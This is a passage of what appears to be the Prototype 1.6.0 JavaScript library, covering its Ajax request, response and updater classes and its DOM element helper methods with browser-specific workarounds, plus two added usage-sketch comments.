|| (this.options.evalJS && contentType
&& contentType.match(/^\s*(text|application)\/(x-)?(java|ecma)script(;.*)?\s*$/i)))
this.evalResponse();
}
try {
(this.options['on' + state] || Prototype.emptyFunction)(response, response.headerJSON);
Ajax.Responders.dispatch('on' + state, this, response, response.headerJSON);
} catch (e) {
this.dispatchException(e);
}
if (state == 'Complete') {
// avoid memory leak in MSIE: clean up
this.transport.onreadystatechange = Prototype.emptyFunction;
}
},
getHeader: function(name) {
try {
return this.transport.getResponseHeader(name);
} catch (e) { return null }
},
evalResponse: function() {
try {
return eval((this.transport.responseText || '').unfilterJSON());
} catch (e) {
this.dispatchException(e);
}
},
dispatchException: function(exception) {
(this.options.onException || Prototype.emptyFunction)(this, exception);
Ajax.Responders.dispatch('onException', this, exception);
}
});
Ajax.Request.Events =
['Uninitialized', 'Loading', 'Loaded', 'Interactive', 'Complete'];
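/* Editor's note: a minimal, illustrative usage sketch of Ajax.Request above; not
   part of the original Prototype 1.6.0 source. The URL and handlers are
   hypothetical, and the function is defined but never invoked, so no request is
   made when this file loads. */
function example_ajaxRequest() {
  new Ajax.Request('/items', {              // hypothetical endpoint
    method: 'get',
    parameters: { q: 'books', page: 2 },    // appended to the URL for GET requests
    onSuccess: function(response) {
      // response is an Ajax.Response: responseText, responseJSON, headerJSON, status...
      var data = response.responseJSON;
    },
    onFailure: function(response) {
      // non-2xx status codes land here
    }
  });
}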
Ajax.Response = Class.create({
initialize: function(request){
this.request = request;
var transport = this.transport = request.transport,
readyState = this.readyState = transport.readyState;
if((readyState > 2 && !Prototype.Browser.IE) || readyState == 4) {
this.status = this.getStatus();
this.statusText = this.getStatusText();
this.responseText = String.interpret(transport.responseText);
this.headerJSON = this._getHeaderJSON();
}
if(readyState == 4) {
var xml = transport.responseXML;
this.responseXML = xml === undefined ? null : xml;
this.responseJSON = this._getResponseJSON();
}
},
status: 0,
statusText: '',
getStatus: Ajax.Request.prototype.getStatus,
getStatusText: function() {
try {
return this.transport.statusText || '';
} catch (e) { return '' }
},
getHeader: Ajax.Request.prototype.getHeader,
getAllHeaders: function() {
try {
return this.getAllResponseHeaders();
} catch (e) { return null }
},
getResponseHeader: function(name) {
return this.transport.getResponseHeader(name);
},
getAllResponseHeaders: function() {
return this.transport.getAllResponseHeaders();
},
_getHeaderJSON: function() {
var json = this.getHeader('X-JSON');
if (!json) return null;
json = decodeURIComponent(escape(json));
try {
return json.evalJSON(this.request.options.sanitizeJSON);
} catch (e) {
this.request.dispatchException(e);
}
},
_getResponseJSON: function() {
var options = this.request.options;
if (!options.evalJSON || (options.evalJSON != 'force' &&
!(this.getHeader('Content-type') || '').include('application/json')))
return null;
try {
return this.transport.responseText.evalJSON(options.sanitizeJSON);
} catch (e) {
this.request.dispatchException(e);
}
}
});
Ajax.Updater = Class.create(Ajax.Request, {
initialize: function($super, container, url, options) {
this.container = {
success: (container.success || container),
failure: (container.failure || (container.success ? null : container))
};
options = options || { };
var onComplete = options.onComplete;
options.onComplete = (function(response, param) {
this.updateContent(response.responseText);
if (Object.isFunction(onComplete)) onComplete(response, param);
}).bind(this);
$super(url, options);
},
updateContent: function(responseText) {
var receiver = this.container[this.success() ? 'success' : 'failure'],
options = this.options;
if (!options.evalScripts) responseText = responseText.stripScripts();
if (receiver = $(receiver)) {
if (options.insertion) {
if (Object.isString(options.insertion)) {
var insertion = { }; insertion[options.insertion] = responseText;
receiver.insert(insertion);
}
else options.insertion(receiver, responseText);
}
else receiver.update(responseText);
}
if (this.success()) {
if (this.onComplete) this.onComplete.bind(this).defer();
}
}
});
Ajax.PeriodicalUpdater = Class.create(Ajax.Base, {
initialize: function($super, container, url, options) {
$super(options);
this.onComplete = this.options.onComplete;
this.frequency = (this.options.frequency || 2);
this.decay = (this.options.decay || 1);
this.updater = { };
this.container = container;
this.url = url;
this.start();
},
start: function() {
this.options.onComplete = this.updateComplete.bind(this);
this.onTimerEvent();
},
stop: function() {
this.updater.options.onComplete = undefined;
clearTimeout(this.timer);
(this.onComplete || Prototype.emptyFunction).apply(this, arguments);
},
updateComplete: function(response) {
if (this.options.decay) {
this.decay = (response.responseText == this.lastText ?
this.decay * this.options.decay : 1);
this.lastText = response.responseText;
}
this.timer = this.onTimerEvent.bind(this).delay(this.decay * this.frequency);
},
onTimerEvent: function() {
this.updater = new Ajax.Updater(this.container, this.url, this.options);
}
});
function $(element) {
if (arguments.length > 1) {
for (var i = 0, elements = [], length = arguments.length; i < length; i++)
elements.push($(arguments[i]));
return elements;
}
if (Object.isString(element))
element = document.getElementById(element);
return Element.extend(element);
}
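/* Editor's note: a minimal, illustrative usage sketch of $() together with the
   Element.Methods defined further below; not part of the original Prototype 1.6.0
   source. The element ids are hypothetical and a loaded DOM is assumed; the
   function is defined but never invoked. */
function example_dollarAndElement() {
  var box = $('sidebar');                  // extended element, or null if not found
  if (box) {
    box.addClassName('highlight').hide();  // Element methods chain on extended elements
    box.update('<p>Refreshed</p>');        // replaces innerHTML; embedded scripts run deferred
  }
  $('header', 'footer').invoke('show');    // multiple ids return an array of elements
  var note = new Element('div', { 'class': 'note' }).update('Saved.');
}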
if (Prototype.BrowserFeatures.XPath) {
document._getElementsByXPath = function(expression, parentElement) {
var results = [];
var query = document.evaluate(expression, $(parentElement) || document,
null, XPathResult.ORDERED_NODE_SNAPSHOT_TYPE, null);
for (var i = 0, length = query.snapshotLength; i < length; i++)
results.push(Element.extend(query.snapshotItem(i)));
return results;
};
}
/*--------------------------------------------------------------------------*/
if (!window.Node) var Node = { };
if (!Node.ELEMENT_NODE) {
// DOM level 2 ECMAScript Language Binding
Object.extend(Node, {
ELEMENT_NODE: 1,
ATTRIBUTE_NODE: 2,
TEXT_NODE: 3,
CDATA_SECTION_NODE: 4,
ENTITY_REFERENCE_NODE: 5,
ENTITY_NODE: 6,
PROCESSING_INSTRUCTION_NODE: 7,
COMMENT_NODE: 8,
DOCUMENT_NODE: 9,
DOCUMENT_TYPE_NODE: 10,
DOCUMENT_FRAGMENT_NODE: 11,
NOTATION_NODE: 12
});
}
(function() {
var element = this.Element;
this.Element = function(tagName, attributes) {
attributes = attributes || { };
tagName = tagName.toLowerCase();
var cache = Element.cache;
if (Prototype.Browser.IE && attributes.name) {
tagName = '<' + tagName + ' name="' + attributes.name + '">';
delete attributes.name;
return Element.writeAttribute(document.createElement(tagName), attributes);
}
if (!cache[tagName]) cache[tagName] = Element.extend(document.createElement(tagName));
return Element.writeAttribute(cache[tagName].cloneNode(false), attributes);
};
Object.extend(this.Element, element || { });
}).call(window);
Element.cache = { };
Element.Methods = {
visible: function(element) {
return $(element).style.display != 'none';
},
toggle: function(element) {
element = $(element);
Element[Element.visible(element) ? 'hide' : 'show'](element);
return element;
},
hide: function(element) {
$(element).style.display = 'none';
return element;
},
show: function(element) {
$(element).style.display = '';
return element;
},
remove: function(element) {
element = $(element);
element.parentNode.removeChild(element);
return element;
},
update: function(element, content) {
element = $(element);
if (content && content.toElement) content = content.toElement();
if (Object.isElement(content)) return element.update().insert(content);
content = Object.toHTML(content);
element.innerHTML = content.stripScripts();
content.evalScripts.bind(content).defer();
return element;
},
replace: function(element, content) {
element = $(element);
if (content && content.toElement) content = content.toElement();
else if (!Object.isElement(content)) {
content = Object.toHTML(content);
var range = element.ownerDocument.createRange();
range.selectNode(element);
content.evalScripts.bind(content).defer();
content = range.createContextualFragment(content.stripScripts());
}
element.parentNode.replaceChild(content, element);
return element;
},
insert: function(element, insertions) {
element = $(element);
if (Object.isString(insertions) || Object.isNumber(insertions) ||
Object.isElement(insertions) || (insertions && (insertions.toElement || insertions.toHTML)))
insertions = {bottom:insertions};
var content, t, range;
for (position in insertions) {
content = insertions[position];
position = position.toLowerCase();
t = Element._insertionTranslations[position];
if (content && content.toElement) content = content.toElement();
if (Object.isElement(content)) {
t.insert(element, content);
continue;
}
content = Object.toHTML(content);
range = element.ownerDocument.createRange();
t.initializeRange(element, range);
t.insert(element, range.createContextualFragment(content.stripScripts()));
content.evalScripts.bind(content).defer();
}
return element;
},
wrap: function(element, wrapper, attributes) {
element = $(element);
if (Object.isElement(wrapper))
$(wrapper).writeAttribute(attributes || { });
else if (Object.isString(wrapper)) wrapper = new Element(wrapper, attributes);
else wrapper = new Element('div', wrapper);
if (element.parentNode)
element.parentNode.replaceChild(wrapper, element);
wrapper.appendChild(element);
return wrapper;
},
inspect: function(element) {
element = $(element);
var result = '<' + element.tagName.toLowerCase();
$H({'id': 'id', 'className': 'class'}).each(function(pair) {
var property = pair.first(), attribute = pair.last();
var value = (element[property] || '').toString();
if (value) result += ' ' + attribute + '=' + value.inspect(true);
});
return result + '>';
},
recursivelyCollect: function(element, property) {
element = $(element);
var elements = [];
while (element = element[property])
if (element.nodeType == 1)
elements.push(Element.extend(element));
return elements;
},
ancestors: function(element) {
return $(element).recursivelyCollect('parentNode');
},
descendants: function(element) {
return $A($(element).getElementsByTagName('*')).each(Element.extend);
},
firstDescendant: function(element) {
element = $(element).firstChild;
while (element && element.nodeType != 1) element = element.nextSibling;
return $(element);
},
immediateDescendants: function(element) {
if (!(element = $(element).firstChild)) return [];
while (element && element.nodeType != 1) element = element.nextSibling;
if (element) return [element].concat($(element).nextSiblings());
return [];
},
previousSiblings: function(element) {
return $(element).recursivelyCollect('previousSibling');
},
nextSiblings: function(element) {
return $(element).recursivelyCollect('nextSibling');
},
siblings: function(element) {
element = $(element);
return element.previousSiblings().reverse().concat(element.nextSiblings());
},
match: function(element, selector) {
if (Object.isString(selector))
selector = new Selector(selector);
return selector.match($(element));
},
up: function(element, expression, index) {
element = $(element);
if (arguments.length == 1) return $(element.parentNode);
var ancestors = element.ancestors();
return expression ? Selector.findElement(ancestors, expression, index) :
ancestors[index || 0];
},
down: function(element, expression, index) {
element = $(element);
if (arguments.length == 1) return element.firstDescendant();
var descendants = element.descendants();
return expression ? Selector.findElement(descendants, expression, index) :
descendants[index || 0];
},
previous: function(element, expression, index) {
element = $(element);
if (arguments.length == 1) return $(Selector.handlers.previousElementSibling(element));
var previousSiblings = element.previousSiblings();
return expression ? Selector.findElement(previousSiblings, expression, index) :
previousSiblings[index || 0];
},
next: function(element, expression, index) {
element = $(element);
if (arguments.length == 1) return $(Selector.handlers.nextElementSibling(element));
var nextSiblings = element.nextSiblings();
return expression ? Selector.findElement(nextSiblings, expression, index) :
nextSiblings[index || 0];
},
select: function() {
var args = $A(arguments), element = $(args.shift());
return Selector.findChildElements(element, args);
},
adjacent: function() {
var args = $A(arguments), element = $(args.shift());
return Selector.findChildElements(element.parentNode, args).without(element);
},
identify: function(element) {
element = $(element);
var id = element.readAttribute('id'), self = arguments.callee;
if (id) return id;
do { id = 'anonymous_element_' + self.counter++ } while ($(id));
element.writeAttribute('id', id);
return id;
},
readAttribute: function(element, name) {
element = $(element);
if (Prototype.Browser.IE) {
var t = Element._attributeTranslations.read;
if (t.values[name]) return t.values[name](element, name);
if (t.names[name]) name = t.names[name];
if (name.include(':')) {
return (!element.attributes || !element.attributes[name]) ? null :
element.attributes[name].value;
}
}
return element.getAttribute(name);
},
writeAttribute: function(element, name, value) {
element = $(element);
var attributes = { }, t = Element._attributeTranslations.write;
if (typeof name == 'object') attributes = name;
else attributes[name] = value === undefined ? true : value;
for (var attr in attributes) {
var name = t.names[attr] || attr, value = attributes[attr];
if (t.values[attr]) name = t.values[attr](element, value);
if (value === false || value === null)
element.removeAttribute(name);
else if (value === true)
element.setAttribute(name, name);
else element.setAttribute(name, value);
}
return element;
},
getHeight: function(element) {
return $(element).getDimensions().height;
},
getWidth: function(element) {
return $(element).getDimensions().width;
},
classNames: function(element) {
return new Element.ClassNames(element);
},
hasClassName: function(element, className) {
if (!(element = $(element))) return;
var elementClassName = element.className;
return (elementClassName.length > 0 && (elementClassName == className ||
new RegExp("(^|\\s)" + className + "(\\s|$)").test(elementClassName)));
},
addClassName: function(element, className) {
if (!(element = $(element))) return;
if (!element.hasClassName(className))
element.className += (element.className ? ' ' : '') + className;
return element;
},
removeClassName: function(element, className) {
if (!(element = $(element))) return;
element.className = element.className.replace(
new RegExp("(^|\\s+)" + className + "(\\s+|$)"), ' ').strip();
return element;
},
toggleClassName: function(element, className) {
if (!(element = $(element))) return;
return element[element.hasClassName(className) ?
'removeClassName' : 'addClassName'](className);
},
// removes whitespace-only text node children
cleanWhitespace: function(element) {
element = $(element);
var node = element.firstChild;
while (node) {
var nextNode = node.nextSibling;
if (node.nodeType == 3 && !/\S/.test(node.nodeValue))
element.removeChild(node);
node = nextNode;
}
return element;
},
empty: function(element) {
return $(element).innerHTML.blank();
},
descendantOf: function(element, ancestor) {
element = $(element), ancestor = $(ancestor);
if (element.compareDocumentPosition)
return (element.compareDocumentPosition(ancestor) & 8) === 8;
if (element.sourceIndex && !Prototype.Browser.Opera) {
var e = element.sourceIndex, a = ancestor.sourceIndex,
nextAncestor = ancestor.nextSibling;
if (!nextAncestor) {
do { ancestor = ancestor.parentNode; }
while (!(nextAncestor = ancestor.nextSibling) && ancestor.parentNode);
}
if (nextAncestor) return (e > a && e < nextAncestor.sourceIndex);
}
while (element = element.parentNode)
if (element == ancestor) return true;
return false;
},
scrollTo: function(element) {
element = $(element);
var pos = element.cumulativeOffset();
window.scrollTo(pos[0], pos[1]);
return element;
},
getStyle: function(element, style) {
element = $(element);
style = style == 'float' ? 'cssFloat' : style.camelize();
var value = element.style[style];
if (!value) {
var css = document.defaultView.getComputedStyle(element, null);
value = css ? css[style] : null;
}
if (style == 'opacity') return value ? parseFloat(value) : 1.0;
return value == 'auto' ? null : value;
},
getOpacity: function(element) {
return $(element).getStyle('opacity');
},
setStyle: function(element, styles) {
element = $(element);
var elementStyle = element.style, match;
if (Object.isString(styles)) {
element.style.cssText += ';' + styles;
return styles.include('opacity') ?
element.setOpacity(styles.match(/opacity:\s*(\d?\.?\d*)/)[1]) : element;
}
for (var property in styles)
if (property == 'opacity') element.setOpacity(styles[property]);
else
elementStyle[(property == 'float' || property == 'cssFloat') ?
(elementStyle.styleFloat === undefined ? 'cssFloat' : 'styleFloat') :
property] = styles[property];
return element;
},
setOpacity: function(element, value) {
element = $(element);
element.style.opacity = (value == 1 || value === '') ? '' :
(value < 0.00001) ? 0 : value;
return element;
},
getDimensions: function(element) {
element = $(element);
var display = $(element).getStyle('display');
if (display != 'none' && display != null) // Safari bug
return {width: element.offsetWidth, height: element.offsetHeight};
// All *Width and *Height properties give 0 on elements with display none,
// so enable the element temporarily
var els = element.style;
var originalVisibility = els.visibility;
var originalPosition = els.position;
var originalDisplay = els.display;
els.visibility = 'hidden';
els.position = 'absolute';
els.display = 'block';
var originalWidth = element.clientWidth;
var originalHeight = element.clientHeight;
els.display = originalDisplay;
els.position = originalPosition;
els.visibility = originalVisibility;
return {width: originalWidth, height: originalHeight};
},
makePositioned: function(element) {
element = $(element);
var pos = Element.getStyle(element, 'position');
if (pos == 'static' || !pos) {
element._madePositioned = true;
element.style.position = 'relative';
// Opera returns the offset relative to the positioning context, when an
// element is position relative but top and left have not been defined
if (window.opera) {
element.style.top = 0;
element.style.left = 0;
}
}
return element;
},
undoPositioned: function(element) {
element = $(element);
if (element._madePositioned) {
element._madePositioned = undefined;
element.style.position =
element.style.top =
element.style.left =
element.style.bottom =
element.style.right = '';
}
return element;
},
makeClipping: function(element) {
element = $(element);
if (element._overflow) return element;
element._overflow = Element.getStyle(element, 'overflow') || 'auto';
if (element._overflow !== 'hidden')
element.style.overflow = 'hidden';
return element;
},
undoClipping: function(element) {
element = $(element);
if (!element._overflow) return element;
element.style.overflow = element._overflow == 'auto' ? '' : element._overflow;
element._overflow = null;
return element;
},
cumulativeOffset: function(element) {
var valueT = 0, valueL = 0;
do {
valueT += element.offsetTop || 0;
valueL += element.offsetLeft || 0;
element = element.offsetParent;
} while (element);
return Element._returnOffset(valueL, valueT);
},
positionedOffset: function(element) {
var valueT = 0, valueL = 0;
do {
valueT += element.offsetTop || 0;
valueL += element.offsetLeft || 0;
element = element.offsetParent;
if (element) {
if (element.tagName == 'BODY') break;
var p = Element.getStyle(element, 'position');
if (p == 'relative' || p == 'absolute') break;
}
} while (element);
return Element._returnOffset(valueL, valueT);
},
absolutize: function(element) {
element = $(element);
if (element.getStyle('position') == 'absolute') return;
// Position.prepare(); // To be done manually by Scripty when it needs it.
var offsets = element.positionedOffset();
var top = offsets[1];
var left = offsets[0];
var width = element.clientWidth;
var height = element.clientHeight;
element._originalLeft = left - parseFloat(element.style.left || 0);
element._originalTop = top - parseFloat(element.style.top || 0);
element._originalWidth = element.style.width;
element._originalHeight = element.style.height;
element.style.position = 'absolute';
element.style.top = top + 'px';
element.style.left = left + 'px';
element.style.width = width + 'px';
element.style.height = height + 'px';
return element;
},
relativize: function(element) {
element = $(element);
if (element.getStyle('position') == 'relative') return;
// Position.prepare(); // To be done manually by Scripty when it needs it.
element.style.position = 'relative';
var top = parseFloat(element.style.top || 0) - (element._originalTop || 0);
var left = parseFloat(element.style.left || 0) - (element._originalLeft || 0);
element.style.top = top + 'px';
element.style.left = left + 'px';
element.style.height = element._originalHeight;
element.style.width = element._originalWidth;
return element;
},
cumulativeScrollOffset: function(element) {
var valueT = 0, valueL = 0;
do {
valueT += element.scrollTop || 0;
valueL += element.scrollLeft || 0;
element = element.parentNode;
} while (element);
return Element._returnOffset(valueL, valueT);
},
getOffsetParent: function(element) {
if (element.offsetParent) return $(element.offsetParent);
if (element == document.body) return $(element);
while ((element = element.parentNode) && element != document.body)
if (Element.getStyle(element, 'position') != 'static')
return $(element);
return $(document.body);
},
viewportOffset: function(forElement) {
var valueT = 0, valueL = 0;
var element = forElement;
do {
valueT += element.offsetTop || 0;
valueL += element.offsetLeft || 0;
// Safari fix
if (element.offsetParent == document.body &&
Element.getStyle(element, 'position') == 'absolute') break;
} while (element = element.offsetParent);
element = forElement;
do {
if (!Prototype.Browser.Opera || element.tagName == 'BODY') {
valueT -= element.scrollTop || 0;
valueL -= element.scrollLeft || 0;
}
} while (element = element.parentNode);
return Element._returnOffset(valueL, valueT);
},
clonePosition: function(element, source) {
var options = Object.extend({
setLeft: true,
setTop: true,
setWidth: true,
setHeight: true,
offsetTop: 0,
offsetLeft: 0
}, arguments[2] || { });
// find page position of source
source = $(source);
var p = source.viewportOffset();
// find coordinate system to use
element = $(element);
var delta = [0, 0];
var parent = null;
// delta [0,0] will do fine with position: fixed elements,
// position:absolute needs offsetParent deltas
if (Element.getStyle(element, 'position') == 'absolute') {
parent = element.getOffsetParent();
delta = parent.viewportOffset();
}
// correct by body offsets (fixes Safari)
if (parent == document.body) {
delta[0] -= document.body.offsetLeft;
delta[1] -= document.body.offsetTop;
}
// set position
if (options.setLeft) element.style.left = (p[0] - delta[0] + options.offsetLeft) + 'px';
if (options.setTop) element.style.top = (p[1] - delta[1] + options.offsetTop) + 'px';
if (options.setWidth) element.style.width = source.offsetWidth + 'px';
if (options.setHeight) element.style.height = source.offsetHeight + 'px';
return element;
}
};
Element.Methods.identify.counter = 1;
Object.extend(Element.Methods, {
getElementsBySelector: Element.Methods.select,
childElements: Element.Methods.immediateDescendants
});
Element._attributeTranslations = {
write: {
names: {
className: 'class',
htmlFor: 'for'
},
values: { }
}
};
if (!document.createRange || Prototype.Browser.Opera) {
Element.Methods.insert = function(element, insertions) {
element = $(element);
if (Object.isString(insertions) || Object.isNumber(insertions) ||
Object.isElement(insertions) || (insertions && (insertions.toElement || insertions.toHTML)))
insertions = { bottom: insertions };
var t = Element._insertionTranslations, content, position, pos, tagName;
for (position in insertions) {
content = insertions[position];
position = position.toLowerCase();
pos = t[position];
if (content && content.toElement) content = content.toElement();
if (Object.isElement(content)) {
pos.insert(element, content);
continue;
}
content = Object.toHTML(content);
tagName = ((position == 'before' || position == 'after')
? element.parentNode : element).tagName.toUpperCase();
if (t.tags[tagName]) {
var fragments = Element._getContentFromAnonymousElement(tagName, content.stripScripts());
if (position == 'top' || position == 'after') fragments.reverse();
fragments.each(pos.insert.curry(element));
}
else element.insertAdjacentHTML(pos.adjacency, content.stripScripts());
content.evalScripts.bind(content).defer();
}
return element;
};
}
if (Prototype.Browser.Opera) {
Element.Methods._getStyle = Element.Methods.getStyle;
Element.Methods.getStyle = function(element, style) {
switch(style) {
case 'left':
case 'top':
case 'right':
case 'bottom':
if (Element._getStyle(element, 'position') == 'static') return null;
default: return Element._getStyle(element, style);
}
};
Element.Methods._readAttribute = Element.Methods.readAttribute;
Element.Methods.readAttribute = function(element, attribute) {
if (attribute == 'title') return element.title;
return Element._readAttribute(element, attribute);
};
}
else if (Prototype.Browser.IE) {
$w('positionedOffset getOffsetParent viewportOffset').each(function(method) {
Element.Methods[method] = Element.Methods[method].wrap(
function(proceed, element) {
element = $(element);
var position = element.getStyle('position');
if (position != 'static') return proceed(element);
element.setStyle({ position: 'relative' });
var value = proceed(element);
element.setStyle({ position: position });
return value;
}
);
});
Element.Methods.getStyle = function(element, style) {
element = $(element);
style = (style == 'float' || style == 'cssFloat') ? 'styleFloat' : style.camelize();
var value = element.style[style];
if (!value && element.currentStyle) value = element.currentStyle[style];
if (style == 'opacity') {
if (value = (element.getStyle('filter') || '').match(/alpha\(opacity=(.*)\)/))
if (value[1]) return parseFloat(value[1]) / 100;
return 1.0;
}
if (value == 'auto') {
if ((style == 'width' || style == 'height') && (element.getStyle('display') != 'none'))
return element['offset' + style.capitalize()] + 'px';
return null;
}
return value;
};
Element.Methods.setOpacity = function(element, value) {
function stripAlpha(filter){
return filter.replace(/alpha\([^\)]*\)/gi,'');
}
element = $(element);
var currentStyle = element.currentStyle;
if ((currentStyle && !currentStyle.hasLayout) ||
(!currentStyle && element.style.zoom == 'normal'))
element.style.zoom = 1;
var filter = element.getStyle('filter'), style = element.style;
if (value == 1 || value === '') {
(filter = stripAlpha(filter)) ?
style.filter = filter : style.removeAttribute('filter');
return element;
} else if (value < 0.00001) value = 0;
style.filter = stripAlpha(filter) +
'alpha(opacity=' + (value * 100) + ')';
return element;
};
Element._attributeTranslations = {
read: {
names: {
'class': 'className',
'for': 'htmlFor'
},
values: {
_getAttr: function(element, attribute) {
return element.getAttribute(attribute, 2);
},
_getAttrNode: function(element, attribute) {
var node = element.getAttributeNode(attribute);
return node ? node.value : "";
},
_getEv: function(element, attribute) {
var attribute = element.getAttribute(attribute);
return attribute ? attribute.toString().slice(23, -2) : null;
},
_flag: function(element, attribute) {
return $(element).hasAttribute(attribute) ? attribute : null;
},
style: function(element) {
return element.style.cssText.toLowerCase();
},
title: function(element) {
return element.title;
}
}
}
};
Element._attributeTranslations.write = {
names: Object.clone(Element._attributeTranslations.read.names),
values: {
checked: function(element, value) {
element.checked = !!value;
},
style: function(element, value) {
element.style.cssText = value ? value : '';
}
}
};
Element._attributeTranslations.has = {};
$w('colSpan rowSpan vAlign dateTime accessKey tabIndex ' +
'encType maxLength readOnly longDesc').each(function(attr) {
Element._attributeTranslations.write.names[attr.toLowerCase()] = attr;
Element._attributeTranslations.has[attr.toLowerCase()] = attr;
});
(function(v) {
Object.extend(v, {
href: v._getAttr,
src: v._getAttr,
type: v._getAttr,
action: v._getAttrNode,
disabled: v._flag,
checked: v._flag,
readonly: v._flag,
multiple: v._flag,
onload: v._getEv,
onunload: v._getEv,
onclick: v._getEv,
ondblclick: v._getEv,
onmousedown: v._getEv,
onmouseup: v._getEv,
onmouseover: v._getEv,
onmousemove: v._getEv,
onmouseout: v._getEv,
onfocus: v._getEv,
onblur: v._getEv,
onkeypress: v._getEv,
onkeydown: v._getEv,
onkeyup: v._getEv,
onsubmit: v._getEv,
onreset: v._getEv,
onselect: v._getEv,
onchange: v._getEv
});
})(Element._attributeTranslations.read.values);
}
else if (Prototype.Browser.Gecko && /rv:1\.8\.0/.test(navigator.userAgent)) {
Element.Methods.setOpacity = function(element, value) {
element = $(element);
element.style.opacity = (value == 1) ? 0.999999 :
(value === '') ? '' : (value < 0.00001) ? 0 : value;
return element;
};
}
else if (Prototype.Browser.WebKit) {
Element.Methods.setOpacity = function(element, value) {
element = $(element);
element.style.opacity = (value == 1 || value === '') ? '' :
(value < 0.00001) ? 0 : value;
if (value == 1)
if(element.tagName == 'IMG' && element.width) {
element.width++; element.width--;
} else try {
var n = document.createTextNode(' ');
element.appendChild(n);
element.removeChild(n);
} catch (e) { }
return element;
};
// Safari returns margins on body which is incorrect if the child is absolutely
// positioned. For performance reasons, redefine Position.cumulativeOffset for
// KHTML/WebKit only.
Element.Methods.cumulativeOffset = function(element) {
var valueT = 0, valueL = 0;
do {
valueT += element.offsetTop || 0;
valueL += element.offsetLeft || 0;
if (element.offsetParent == document.body)
if (Element.getStyle(element, 'position') == 'absolute') break;
element = element.offsetParent;
} while (element);
return Element._returnOffset(valueL, valueT);
};
}
if (Prototype.Browser.IE || Prototype.Browser.Opera) {
// IE and Opera are missing .innerHTML support for TABLE-related and SELECT elements
Element.Methods.update = function(element, content) {
element = $(element);
if (content && content.toElement) content = content.toElement();
if (Object.isElement(content)) return element.update().insert(content);
content = Object.toHTML(content);
var tagName = element.tagName.toUpperCase();
if (tagName in Element._insertionTranslations.tags) {
$A(element.childNodes).each(function(node) { element.removeChild(node) });
Element._getContentFromAnonymousElement(tagName, content.stripScripts())
.each(function(node) { element.appendChild(node) });
}
else element.innerHTML = content.stripScripts();
content.evalScripts.bind(content).defer();
return element;
};
}
if (document.createElement('div').outerHTML) {
Element.Methods.replace = function(element, content) {
element = $(element);
if (content && content.toElement) content = content.toElement();
if (Object.isElement(content)) {
element.parentNode.replaceChild(content, element);
return element;
}
content = Object.toHTML(content);
var parent = element.parentNode, tagName = parent.tagName.toUpperCase();
if (Element._insertionTranslations.tags[tagName]) {
var nextSibling = element.next();
var fragments = Element._getContentFromAnonymousElement(tagName, content.stripScripts());
parent.removeChild(element);
if (nextSibling)
fragments.each(function(node) { parent.insertBefore(node, nextSibling) });
else
fragments.each(function(node) { parent.appendChild(node) });
}
else element.outerHTML = content.stripScripts();
content.evalScripts.bind(content).defer();
return element;
};
}
Element._returnOffset = function(l, t) {
var result = [l, t];
result.left = l;
result.top = t;
return result;
};
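// Wraps markup that can't be assigned via innerHTML directly (table and select
// children) in the required parent tags, then walks back down to the generated nodes.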
Element._getContentFromAnonymousElement = function(tagName, html) {
var div = new Element('div'), t = Element._insertionTranslations.tags[tagName];
div.innerHTML = t[0] + html + t[1];
t[2].times(function() { div = div.firstChild });
return $A(div.childNodes);
};
Element._insertionTranslations = {
before: {
adjacency: 'beforeBegin',
insert: function(element, node) {
element.parentNode.insertBefore(node, element);
},
initializeRange: function(element, range) {
range.setStartBefore(element);
}
},
top: {
adjacency: 'afterBegin',
insert: function(element, node) {
element.insertBefore(node, element.firstChild);
},
initializeRange: function(element, range) {
range.selectNodeContents(element);
range.collapse(true);
}
},
bottom: {
adjacency: 'beforeEnd',
insert: function(element, node) {
element.appendChild(node);
}
},
after: {
adjacency: 'afterEnd',
insert: function(element, node) {
element.parentNode.insertBefore(node, element.nextSibling);
},
initializeRange: function(element, range) {
range.setStartAfter(element);
}
},
tags: {
TABLE: ['<table>', '</table>', 1],
TBODY: ['<table><tbody>', '</tbody></table>', 2],
TR: ['<table><tbody><tr>', '</tr></tbody></table>', 3],
TD: ['<table><tbody><tr><td>', '</td></tr></tbody></table>', 4],
SELECT: ['<select>', '</select>', 1]
}
};
(function() {
this.bottom.initializeRange = this.top.initializeRange;
Object.extend(this.tags, {
THEAD: this.tags.TBODY,
TFOOT: this.tags.TBODY,
TH: this.tags.TD
});
}).call(Element._insertionTranslations);
Element.Methods.Simulated = {
hasAttribute: function(element, attribute) {
attribute = Element._attributeTranslations.has[attribute] || attribute;
var node = $(element).getAttributeNode(attribute);
return node && node.specified;
}
};
Element.Methods.ByTag = { };
Object.extend(Element, Element.Methods);
if (!Prototype.BrowserFeatures.ElementExtensions &&
document.createElement('div').__proto__) {
window.HTMLElement = { };
window.HTMLElement.prototype = document.createElement('div').__proto__;
Prototype.BrowserFeatures.ElementExtensions = true;
}
Element.extend = (function() {
if (Prototype.BrowserFeatures.SpecificElementExtensions)
return Prototype.K;
var Methods = { }, ByTag = Element.Methods.ByTag;
var extend = Object.extend(function(element) {
if (!element || element._extendedByPrototype ||
element.nodeType != 1 || element == window) return element;
var methods = Object.clone(Methods),
tagName = element.tagName, property, value;
// extend methods for specific tags
if (ByTag[tagName]) Object.extend(methods, ByTag[tagName]);
for (property in methods) {
value = methods[property];
if (Object.isFunction(value) && !(property in element))
element[property] = value.methodize();
}
element._extendedByPrototype = Prototype.emptyFunction;
return element;
}, {
refresh: function() {
// extend methods for all tags (Safari doesn't need this)
if (!Prototype.BrowserFeatures.ElementExtensions) {
Object.extend(Methods, Element.Methods);
Object.extend(Methods, Element.Methods.Simulated);
}
}
});
extend.refresh();
return extend;
})();
Element.hasAttribute = function(element, attribute) {
if (element.hasAttribute) return element.hasAttribute(attribute);
return Element.Methods.Simulated.hasAttribute(element, attribute);
};
Element.addMethods = function(methods) {
var F = Prototype.BrowserFeatures, T = Element.Methods.ByTag;
if (!methods) {
Object.extend(Form, Form.Methods);
Object.extend(Form.Element, Form.Element.Methods);
Object.extend(Element.Methods.ByTag, {
"FORM": Object.clone(Form.Methods),
"INPUT": Object.clone(Form.Element.Methods),
"SELECT": Object.clone(Form.Element.Methods),
"TEXTAREA": Object.clone(Form.Element.Methods)
});
}
if (arguments.length == 2) {
var tagName = methods;
methods = arguments[1];
}
if (!tagName) Object.extend(Element.Methods, methods || { });
else {
if (Object.isArray(tagName)) tagName.each(extend);
else extend(tagName);
}
function extend(tagName) {
tagName = tagName.toUpperCase();
if (!Element.Methods.ByTag[tagName])
Element.Methods.ByTag[tagName] = { };
Object.extend(Element.Methods.ByTag[tagName], methods);
}
function copy(methods, destination, onlyIfAbsent) {
